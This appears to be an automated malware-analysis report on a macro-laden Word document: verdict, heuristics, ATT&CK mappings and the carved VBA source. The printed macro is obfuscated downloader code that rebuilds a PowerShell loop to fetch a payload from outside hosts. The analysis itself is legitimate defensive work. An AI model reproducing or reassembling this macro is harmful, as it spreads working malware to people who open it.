Verdict: MALICIOUS
Risk Score: 282

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample is a malicious OLE document containing a VBA macro. The macro uses a Shell() call, flagged by the OLE_VBA_SHELL heuristic, to execute a command, which suggests its purpose is to download and run a second-stage payload. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further supports dropper or phishing-lure functionality.
Heuristics (8)

- ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Password-protected archive handoff (high, SE_PASSWORD_ARCHIVE_LURE): Document gives password instructions for an archive or attachment; this is often used to keep payloads encrypted until after gateway scanning.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 93783 bytes |

SHA-256: b37e86fe233d60ca46b5caf85b055dea3db764099deedbf8490980e3c9856a43

Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "GPfWUfwQlpJB"
Function SjhfFYcGMspiK()
UThkLAwzCh = ("GVtALiwRG" + "AzZGzrqLf" + "ubpGkiZlYuhok" + "ZYFiwYwFlVhw" + "jCbRisuYij" + "PhJLsLiMMmha") + ("MOGrppTYnFpi" + "dzvqOurTPPPkMa" + "VkmCbpFTmDjoM" + "bcTcvhiQW" + "njSwzqGcPj" + "DSnHHYj")
sVBShUjab = ("pMNPzBP" + "jrQaFXAp" + "inwusrJfJzVihJ" + "DXhvzRUrsRL" + "jkwUsjXfPsJzU" + "kpEthCh") + ("WhpFpjJvGcjBd" + "KcduJiNKOkawhf" + "wjJJrNQimtqVT" + "jRTaoibQmsDb" + "TFftwiIH" + "WrliuzqBTItXi")
MWDHNP = Mid("zDYFh'+'e'+'OqU+O'+'qUm(OqU+OqUITsOqU+OqUxHF+xHFhuas);breOqU+OqUaOqU+OqUk;}catOqU+OxHF+xHFqUch{OqU+xHF+xHFOqU'+'wriOqU+OqUtOqU+OqUe-host OqU+OqUITOqU+OqUs'+'_.ExcOqU+Oq'+'UeptxHFA4WG15", 6, 173)
nYIAAGrE = ("miFfFnnw" + "RsEFNOPs" + "IUvwGZjKXJ" + "VnJCGkthDNI" + "uzLWbwpE" + "PkPLOpYjwu") + ("dQmdiCwdV" + "oJAHBzvCEMhE" + "FCuqsuVB" + "TsiiMhn" + "zMjpabPDMr" + "duhiYHjaoLG")
nEVXYL = ("OwGYjMw" + "ptJHVYJbXzWFXv" + "WXlnLrhVWRTOAR" + "VkPIiQF" + "iXKhYUHlcTzk" + "uYkIHXn") + ("CKIKUbmpOQjRm" + "PAJJBPfr" + "BhCbLiAXsRvbNB" + "DsUvNDQTOn" + "kzwWYKKP" + "cSAaLOsq")
VWZdXYVJNJ = ("AjjqHZWlNOiN" + "VSibfmfCsX" + "lKKWfGzO" + "cjJrlHiqGPOPU" + "CpCzIYaj" + "JYEzPAFG") + ("QUtmJnqYI" + "wcIuRzHjdHqpS" + "bATjJPpAIzwzTQ" + "PJkQljfAdnAI" + "czXbCwLIUJ" + "szwTJvRdq")
EztShN = Mid("jDPGs4ME(xHFOqUxHF,[stRIng][ChaR]39).rePLacE(([ChaR]119+[ChaR]79+[Ch'+'aR]51),[stRIng][ChaR]0lhi", 8, 85)
pjqjzFjN = ("qfCznFJujdrlOo" + "DuBZWtlRwutls" + "kzKZUXHGlLsNda" + "XVOiMXRNTUFE" + "DEtUQAzih" + "uQjwJpjJ") + ("LjaYfHfWT" + "qFOStCjSYwdb" + "qJUNjaH" + "nKptidfNNl" + "fsrHfwnucWI" + "mkjkPKtzv")
iIcjLc = ("GmjizBvMLtXQiN" + "RHvCjQadfz" + "GYjOEPjFoBrE" + "AzobSXIWTr" + "GZZjijI" + "iNvXdwp") + ("jZZTZCZC" + "cwKHqNmjiIiq" + "WHspZIFaKidPZz" + "YiDzWzFiwuozIq" + "oKSlCRbjcRwLRT" + "sQQsHzFiTzRZ")
iwrYBczczJ = ("NDuZYOZB" + "LLAvKwC" + "PtjfCizDJwtPD" + "lhUioMFZY" + "bRzBloVlNU" + "FPjLYwWPQfl") + ("rZTbfKp" + "qUKDlhwRUcHC" + "pjRnTPQjJIpq" + "FcSNpaYkn" + "EcarAEvnYiTC" + "BnMvYAhMVNVbT")
TpFnT = Mid("owL9DI6+Oq'+'U.ru/exHF+xHFFnHpOqU+OqU/,httpOqU+OqUxHF+xHF://wOqU+OqUoOqU+OqUu'+'OqU+OqUwOQmPl", 8, 82)
TiuTGW = ("vlIwjLqTwnvdzv" + "ialoOQBXjPi" + "jfwmlrhorIzcGd" + "vdUPKEiwt" + "cKduNZhAM" + "nzBKlQGi") + ("aJhlDFuOzYu" + "jFXIjDu" + "jSbuWazbKiu" + "vVSEvZaoTKhcRC" + "sdCEMME" + "IinPcHTEVdwIN")
hVnBVqVkrO = ("ZMNlDrn" + "FaAcHsnwjGIwH" + "vWSiaNpVo" + "kVKSkMKVCPmPR" + "ppIHsBcpwHQqSU" + "ZzjlNsmiV") + ("XvmvrffFT" + "lFidnKvYCCttq" + "dRCiEHD" + "ntVFqtEc" + "kzbfUPGzCwNf" + "ViFhSadBB")
iQwJOfvwPZG = ("TNHdFKYlwcTWF" + "IZilriKWHJzjAG" + "wUuqEKpw" + "GtSWjLwFCVvw" + "LRicwFwjZKSZzH" + "jAnTdzizMn") + ("vMriiKPDJcHc" + "jzChjzzkD" + "ZBhcTwhUVo" + "JlovfIKw" + "wYYZjfzzONqCsp" + "czhwGcHln")
GVIYOfks = Mid("5UXwtRM5BwPfGabFVr. ( $Env:pUbL4zs1zC", 19, 13)
JIRmE = ("qdRoIhUC" + "aRIuPZICvh" + "KpbUXrA" + "bizjjnlC" + "awQiutE" + "MjqIJYh") + ("zAACzQQhLa" + "bhZGiXGbwQTQw" + "TLHKARGRPj" + "kAFJhjWTDdTn" + "MlDwkDjkDfi" + "JWLJiJS")
fCKoQzMwwCS = ("hvlTtAafTWi" + "iftiVHAj" + "YswDwMaRlHna" + "USrEvhn" + "XBaaskW" + "aJhUtJCpPwozNh") + ("vjYKaqQMS" + "fAqWcDcESLwFF" + "LQBowtno" + "nirTawHJzPbOI" + "TnsMvvWQ" + "dMzKpcNZFrLDs")
ZAPDp = ("TtXARPhzwstzY" + "wOOJhMDBhUb" + "YMKKUTB" + "JTOCiVVioKlihf" + "wuZcFlSLCZ" + "rVmlYZzaU") + ("ALiMqUMXjwW" + "oNQvrvMrHMdRi" + "wDmMjHL" + "wiuPORFoTcqwj" + "UchBNdXoiN" + "qYJkWPPjvRhB")
mjzMRtKtSD = Mid("mmqQA50J701DANDGlis/b2oxHF+xHFOqU+OqUjS/,hOqU+OqUttp:/'+'/dOqxHF+'+'xHFU+OqUericisOqU+OxHF+xHFqUhoexHF+xHFs.OqU+OqUcom/xAOqU+OqU5ey/,httOqU+OqUp://OqU+OqUepc.freelanceOqU+9pVwbp3zZXHTB0Ajqm", 18, 154)
OHibEGIhz = ("kBHLBBqizCEi" + "FhstSWn" + "GblSjjpWX" + "IbCIKnkUOAwPwG" + "bHrMzsjE" + "daWsVRAIaF") + ("HwzXFJwHnPrffL" + "bwJZFbW" + "fjRrzzzqoqKz" + "KUHouZRGlvq" + "PqCwAAUkRSno" + "wKnZDoVMb")
LBkWzifM = ("iwMmAqDN
```

... (truncated)